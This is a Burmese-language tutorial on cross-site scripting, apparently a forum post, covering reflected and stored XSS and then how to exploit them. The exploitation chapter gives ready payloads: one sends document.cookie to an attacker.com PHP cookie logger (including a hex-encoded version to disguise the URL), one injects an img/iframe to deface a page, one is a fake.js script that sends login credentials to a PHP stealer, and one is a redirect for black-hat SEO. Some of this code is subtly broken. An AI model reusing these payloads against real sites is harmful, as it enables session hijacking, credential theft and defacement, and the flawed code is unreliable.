ကျွန်တော်နဲ့ ကိုsoftenhackerတို့ပေါင်းလုပ်ထားတဲ့ ဆိုက်ကိုအရင်ဖိတ်ခေါ်ပါတယ် လင့်က http://www.mmityouths.wall.fm ပါ
အွန်လိုင်းမှာဟိုးလေးတကျော်ကျော်ဖြစ်နေတဲ့ XSSအကြောင်းလေးကို mmsoကနေ စုစည်းတင်ပြလိုက်ပါတယ်ဗျာ
XSS (Cross Site Scripting)
CHAPTER I
XSS လို့ခေါ်တဲ့ Cross Site Scripting ကိုအရင်တုန်းကတော့ CSS လို့ခေါ်ဆိုခဲ့ ကြပါတယ် ဒါပေမဲ့လူတွေက Cascading Style Sheet (CSS) နဲ့မှားယွင်းတတ်ကြလို့ 2002 ခုနှစ်မှာ Steve Champeon ဆိုသူက CSS ဆိုတဲ့အခေါ်အဝေါ်အစား XSS လို့ပြောင်းလဲခေါ်ဆိုသတ်မှတ်ကြဖို့ အကြံပြုခဲ့ရာကစပြီး Cross Site Scripting ဆိုတဲ့ Attack ကို XSS လို့ပြောင်လဲခေါ်ဆိုခဲ့ကြပါတယ်
XSS ဆိုတဲ့ Cross Site Scripting Attack ဟာ Web Site တွေရဲ့လုံခြုံရေးဆိုင်ရာအားနည်းချက် (vulnerabilities) တွေကတစင့် Web Site ရဲ့ Structure ထဲကို Java Script တွေကို Attacker (Hacker) တွေက ထည့်သွင်းအသုံးပြုနိုင်တဲ့ Attack တစ်မျိုးပါ XSS ကိုယေဘုယျ အားဖြင့်တော့
Temporary XSS
Permanent XSS
ဆိုပြီး ခွဲခြားလို့ရပါတယ်
Temporary XSS
သူကတော့ URL သို့မဟုတ် Field Based XSS ပါ
URL Based XSS ဆိုတာကတော့ URL Strings တွေကတစင့် Java Script တွေကို Attacker ကထည့်သွင်းနိုင်တာမျိုးကိုခေါ်တာပါ
ဥပမာ
http://www.target.com/page.php?result=<script>alert('xss')</script> အပေါ်က ဥပမာကိုကြည့်မယ်ဆိုရင် တကယ်လို့ user တစ်ယောက်ကဖော်ပြပါ page ကိုများ သွားခဲ့မယ် ဆိုရင် သူ့ရဲ့ browser မှာ xss ဆိုတဲ့ alert တစ်ခုတက်လာမှာကိုတွေ့ရမှာဖြစ်ပါတယ် တကယ်တမ်းတော့ အဲဒါဟာ page.php မှာပါဝင်တဲ့ alert မဟုတ်ပါဘူး ဒါပေမဲ့ အဲဒီ page က vulnerable parameter ဖြစ်တဲ့ result ဆိုတာကြောင့် (coding ပိုင်း မှာ filter မလုပ်ထားတာကြောင့်) ဖြစ်တာပါ အဲဒါကြောင့် Attacker (Hacker) က URL String မှာ <script>alert('xss')</script> လို့ထည့်သွင်းလိုက်တဲ့အခါမှာ xss ဆိုတဲ့ Alert ပေါ်လာရခြင်းပဲဖြစ်ပါတယ်
Field Based XSS
Field Based XSS ဆိုတာကတော့ Server ကနေပြီး process လုပ်ပြီး ပြန်ပြီး display လုပ်ပေးတဲ့ field တွေထဲမှာ Java Script တွေကို Attacker (Hacker) ကထည့်သွင်းတာကိုပြောတာပါ သူကလည်း URL based XSS နဲ့ ဆင်တူပါတယ် ဒီမှာကတော့ Attacker ဟာသူ့ရဲ့ Java Script ကို Form Field ထဲမှာ ထည့်သွင်းပေးရပါတယ်
ဥပမာ
Web Site တစ်ခုမှာ Search Box ရှိပြီး သူဟာ XSS vulnerability ရှိတယ်ဆိုပါစို့ ဆိုလိုတာက user ကရှာသမျှကို search result page မှာ ဖော်ပြပေးတာပါ အဲဒီအခါမှာ Attacker က အဲဒီ Search Box ထဲမှာ
<script>alert('xss')</script>
လို့ ရိုက်ထည့်ပြီး ရှာလိုက်ရင် xss ဆိုတဲ့ pop up box တစ်ခုတက်လာပါလိမ့်မယ်
ရုတ်တရက်ကြည့်လိုက်ရင်တော့ အဲဒီလိုမျိုး Temporary XSS တွေဟာ ဘာ အန္တရာယ် မှမရှိလောက်ဘူးလို့ ထင်ရပေမဲ့ Attacker (Hacker) တွေအတွက်ကတော့ သူတို့ရဲ့ Defacement ကိုပြုလုပ်ဖို့အတွက် ပထမဦးဆုံးသော ခြေလှမ်းကို စတင်စေနိုင်ပါတယ်
Permanent XSS (Persistent ????????? Script Injection)
ဒီအပိုင်းကအရေးကြီးသလို အန္တရာယ် လည်း ကြီးပါတယ် သူကတော့ user တစ်ယောက်ရိုက်ထည့်လိုက်တဲ့ Data ကို Web Site ရဲ့ DataBase ထဲမှာ သိမ်းထားပေးပြီး user ကို ပြန်လည် ပြသပေးပါတယ်
ဥပမာ
Web Site တစ်ခုမှာ Comment Box သို့မဟုတ် Guest Book ရှိပြီး အဲဒါဟာ XSS vulnerable ဖြစ်တယ်ဆိုကြပါစို့ အဲဒါကို Attacker (Hacker) က
<script>alert('xss')</script>
ဆိုပြီး ရိုက်ထည့်လိုက်မယ်ဆိုရင် အထက်မှာဖော်ပြခဲ့သလိုပဲ အဲဒီ script ဟာ Web Site ရဲ့ DataBase ထဲမှာ သွားပြီးသိမ်းဆည်းထားပါတယ် Attacker (Hacker) ရဲ့ အဲဒီ malicious script ဟာ အဲဒီ comment page ကို browse လုပ်တဲ့ user တိုင်းကို xss ဆိုတဲ့ popup message ကိုဖော်ပြပေးမှာဖြစ်ပါတယ်
ဒါတွေကတော့ XSS နဲ့ပတ်သတ်တဲ့ Theoritical Concept တွေပါ အဲဒါတွေကိုနားလည်ပြီဆိုရင်တော့ ရှေ့ဆက်လိုက်ရအောင်
Finding XSS
XSS Vulnerability တွေကိုရှာဖွေတဲ့အခါမှာတော့ Penetration Tester တွေဟာ Hacking Life Cycle အတိုင် တစ်ဆင့်ပြီးတစ်ဆင့် စနစ်တကျနဲ့ ရှာဖွေကြပါတယ် သူတို့ရဲ့ရည်ရွယ်ချက်ကိုက Site တစ်ခုလုံးမှာရှိတဲ့ XSS Vulnerability တွေကိုရှာပြီး fix လုပ်ဖို့ပါ ဒါပေမဲ့ Black Hat တွေကတော့ XSS Vulnerability တစ်ခုလောက်ကိုပဲတွေ့အောင်ရှာကြပါတယ် ဘာဖြစ်လို့လဲဆိုတော့ သူတို့ရဲ့ မူလရည်ရွယ်ချက်ကိုက Defacement သို့မဟုတ် Backdooring ဆိုတာအတွက်ပါ အဲဒါကိုတော့ Technical Terms အရ Offensive Computing လို့ခေါ်ကြပါတယ် အဲဒီနေရာမှာလည်း Black Hat တွေတစ်ယောက်နဲ့တစ်ယောက်သုံးတဲ့နည်းစနစ်ချင်းမတူ ကြပါဘူး တချို့ကတော့ Google Dorks တွေကိုသုံးပြီး ရှာဖွေကြသလို တချို့ကျတော့လည်း Scanner တွေသုံးပြီး ရှာဖွေကြပါတယ် တချို့ကျတော့လည်း manually ပဲ Targeted Site ရဲ့ page တွေမှာလိုက်ရှာတတ်ကြပါတယ် အဲဒီအခါမှာ Vulnerability တွေကိုတွေ့ဖို့ကတော့ မျက်စေ့ လျှင်လျှင်နဲ့ parameter တွေကိုကြည့်ပြီး ဖြစ်နိုင်ခြေတွေကို စဉ်းစားတွက်ချက်တတ်ဖို့ပဲလိုတာပါ များသောအားဖြင့်တော့အဲဒီ Vulnerability တွေဟာ
Search Field
URL Bar (Address Bar)
Form Fields
Shout Box
Avatar Field
Signature
စတာတွေမှာတွေ့ရလေ့ရှိပါတယ်

CHAPTERIII
ဒီတစ်ခါတော့ Exploiting XSS ဆိုတာကိုဆွေးနွေးသွားမှာဖြစ်ပါတယ်
XSS vulnerability တွေကနေတဆင့် attacker တွေ ပြုလုပ်လေ့ရှိကြတာကတော့
Cookie Stealing
Defacing
Data Stealing
Black Hat CEO
Worms and Viruses
Cookie Stealing
အဲဒါကတော့ XSS vulnerability တွေကနေတဆင့် attacker တွေ အလုပ်ဆုံးအရာတစ်ခုပါ
user တွေရဲ့ cookie တွေကို hijack လုပ်မယ် အဲဒီကနေတစ်ဆင့် တခြား information တွေကိုယူမယ် စသဖြင့်ပေါ့
ဥပမာဗျာ
www.example.com ဆိုပါစို့
အဲဒီ site ရဲ့ search.php မှာ XSS vulnerability ရှိတယ်ဆိုပါစို့
အဲဒါကဒီလိုဗျာ
www.example.com/search.php?q= အဲဒါကို attacker က အဲဒီ site ကတစ်ခြား user တစ်ယောက်ရဲ့ cookie ကို လိုချင်တယ်ဆိုပါစို့
အဲဒါဆိုရင် Attacker က ဒီလိုမျိုးကြိုးပမ်းနိုင်ပါတယ်
http://www.example.com/search.php?q= document.location = "http://attacker.com/cookielogger.php?c="+document.cookie အဲဒီမှာထည့်သွင်းထားတဲ့ document.location ဆိုတာကတော့
http://attacker.com/cookielogger.php? ဆိုတဲ့ document ရှိတဲ့နေရာကိုပြောတာပါ
အဲဒီ cookielogger.php ထဲက c ဆိုတာကတော့ အဲဒီ cookielogger php ထဲမှာ cookie ကို load လုပ်ဖို့အတွက်သုံးတဲ့ get variable ပါ
document.cookie ဆိုတာကတော့ cookie ကို load လုပ်ဖို့အတွက်သုံးတဲ့ javascript ပါ
http://www.example.com/search.php?q= document.location = "http://attacker.com/cookielogger.php?c="+document.cookie အဲဒီတော့ အပေါ်ကRUL String မှာထဲ့ထားတဲ့အတိုင်းဆိုရင် http://www.example.com မှာရှိတဲ့ search.php ရဲ့ q ဆိုတဲ့ variable ကနေတဆင့် http://attacker.com မှာရှိတဲ့ cookielogger.php ရဲ့ c ဆိုတဲ့ variable ထဲကို လက်ရှိ user ရဲ့ cookie ကဝင်ရောက်သွားပါလိမ့်မယ်
<?php
$file = fopen("cookies.txt","a");
$cookies = $_GET['c'];
$content = "Cookies = ".$cookies."\n";
fwrite($file,$content);
fclose($file);
?> အဲဒါကတော့ cookie logger ရဲ့ code ပါ
အဲဒီ code အရဆိုရင်သူကရရှိလာတဲ့ cookie တွေကို cookies.txt ဆိုတဲ့ file ထဲမှာထည့်သွင်းပေးပါလိမ့်မယ်
တစ်ကယ်လို့ Attacker က သူ့ရဲ့ url ကို victim ကိုပေးမသိစေချင်ရင် သူဟာ url ကို encode လုပ်ပြီးပေးပို့ပါလိမ့်မယ်
ဒါကတော့ဒီလိုပါ
document.location = "http://attacker.com/cookielogger.php?c="+document.cookie
ကို encode လုပ်တာပါ
အဲဒီ document.location = "http://attacker.com/cookielogger.php?c="+document.cookie ကို encode လုပ်မယ်ဆိုရင် အောက်က encode လုပ်ထားတဲ့ Hex Value ကိုရရှိပါလိမ့်မယ်
%22%68%74%74%70%3A%2F%2F%61%74%74%61%63%6B%65%72%2 E%63%6F%6D%2F%63%6F%6F%6B%69%65%6C%6F%67%67%65%72% 2E%70%68%70%3F%63%3D%22%2B%64%6F%63%75%6D%65%6E%74 %2E%63%6F%6F%6B%69%65%20
ဒါဆိုရင် URL String ဟာ အောက်မှာပြထားတဲ့အတိုင်းပြောင်းလဲသွားပါလိမ့်မယ်
http://www.example.com/search.php?q=...6F%6B%69%65%20
Defacing
XSS vulnerability ကိုသုံးပြီး Permently (သို့မဟုတ်) Temporarily Deface လုပ်နိုင်ပါတယ်
ဥပမာ အောက်က လိုမျိုး code တွေကို embed လုပ်ခြင်းအားဖြင့် လဲ လုပ်နိုင်ပါတယ်
<img src = http://www.attacker.com/defaceimg.jpg>
ဒါမှမဟုတ်ရင် iframe နဲ့လည်း ဒီလို လုပ်နိုင်ပါတယ်
<iframe src = http://www.attacker.com/defacepage.html width = “100%” height=”100%”></iframe>
အဲဒါကတော့ဒါမျိုးပါ
ဒီမှာတော့ ကျွန်တော် Temporary Defacement အနေနဲ့ပဲဥပမာပြထားပါတယ်
http://www.example.com/search.php?q=<img src = http://www.attacker.com/deface.jpg>
Phishing
Phishing ဆိုတဲ့ဝေါဟာရကတော့ကျွန်တော်သိသလောက်ပြောရရင် Fishing ဆိုတဲ့ဝေါဟာရကို ခေါ်တာပါ အဲဒါကတော့ user ရဲ့ login credentials တွေကို ကိုအတုပြုလုပ်ပြီးရယူတာမျိုးပါ
Phishing attack မှာဆိုရင် Attacker က login page အတုတစ်ခုကိုပြုလုပ်ပြီး အဲဒီ link ကို victim ဆီကိုပို့ပေးပါတယ် victim က အဲဒီ fake login page မှာ login လုပ်လိုက်တာနဲ့ Attacker က victim ရဲ့ login credentials တွေကို ရရှိပါလိမ့်မယ်
အဲဒါကို Attacker က javascript ကနေတဆင့် login credential တွေကိုဘယ်လို capture လုပ်နိုင်မလဲဆိုတာကိုကြည့်လိုက်ကြရအောင်
ဥပမာ login form တစ်ခုက ဒီလိုရှိတယ်ဆိုပါစို့
<form action=”login.php” method = “POST” name=”login”>
Username : <input type = "text" name ="username"></br>
Password : <input type = "password" name= "password"></br>
<input type="submit" name="submit" value="Login">
</form> အဲဒါဆိုရင် login credentials တွေဟာ login.php ဆီကို POST method နဲ့ပို့ပေးပါလိမ့်မယ်
ဟုတ်ပြီဒါဆိုရင် Attacker ဟာ victim ဆီကို login credentials တွေကိုရယူဖို့အတွက် အောက်မှာပြထားတဲ့အတိုင်းကြိုးစားနိုင်ပါတယ်
http://www.example.com/index.php?q=<script src= "http://www.attacker.com/fake.js"></script>
အဲဒီက fake.js ဆိုတာကတော့ user login ကို capture လုပ်ဖို့အတွက် attacker ကသုံးထားတဲ့ malicious script ပါ အဲဒါကိုမှ victim အနေနဲ့သံသယမရှိစေချင်ရင်တော့ Attacker ဟာ ခုနကကျွန်တော်ပြောခဲ့သလိုမျိုး encode လုပ်ပါလိမ့်မယ်
အဲဒီ fake.js ရဲ့ source code ကို ကျွန်တော်အောက်မှာပြထားပါတယ်
var iframe = document.createElement("iframe");
//hide the iframe
iframe.style.display = "none";
// load your login stealer script
iframe.src = "http://attacker.com/steal.php?username="
+ document.form[“login”].username.value + "&password=" + document.form[“login”].password.value;
// add iframe to websites body
document.body.appendChild(iframe);
}
// record logins when user press submit button
document.form[“login”].onsubmit = steal(); အောက်မှာပြထားတာကတော့ steal.php ရဲ့ code ပါ
<?php
if(isset($_GET['user']) && isset($_GET['pass']))
{
$file = fopen($steal.txt, "a");
$login = "Username: ". $_GET['username'] ." and Password: ". $_GET['password'] . "\n";
fwrite($file, $login);
fclose($file);
}
?> အဲဒီအတိုင်းဆိုရင် တကယ်လို့များ victim ဟာ အဲဒီ ကနေတဆင့် login လုပ်လိုက်မယ်ဆိုရင် fake.js ဟာ login credentials တွေကို steal.php ဆီကိုပို့ပေးပါလိမ့်မယ် အဲဒီအခါမှာ steal.php ဟာ ပို့ပေးလိုက်တဲ့ login credentials တွေကို steal.txt ဆိုတဲ့ file ထဲမှာ သွားပြီး record လုပ်ပေးပါလိမ့်မယ်
Data Stealing
အဲဒါကတော့ အသုံးနည်းပါတယ်အဲဒါကြောင့်မို့ ကျွန်တော်လည်းမဆွေးနွေးတော့ပါဘူး
Black Hat SEO
ဒါကတော့ Webmaster တွေ အတွက်ရော Attacker တွေအတွက်ရောအရေးကြီးပါတယ်
ဥပမာ Attacker က
http://www.example.com/search.php?q=
ဆိုတဲ့ vulnerable ကနေတဆင့် တခြား site တစ်ခုကို redirect လုပ်လိုက်နိုင်ပါတယ်
(အောက်မှာပြထားပါတယ်)
http://www.example.com/search.php?q= <script>document.location( "http://www.attacker.com.com" )</script>
အဲဒါကတော့ search quries တွေကနေတဆင့် better page ranking ကိုရရှိစေပါတယ်
Worms and Viruses
အဲဒီအပိုင်းကတော့အရမ်းကျယ်ပြန့်လွန်းပြီး XSS ရဲ့နောက်ထပ် generation လို့တောင်ခေါ်နိုင်ပါတယ်
အဲဒါကိုသိချင်ရင်တော့ Self Study လုပ်တာပိုကောင်းပါလိမ့်မယ်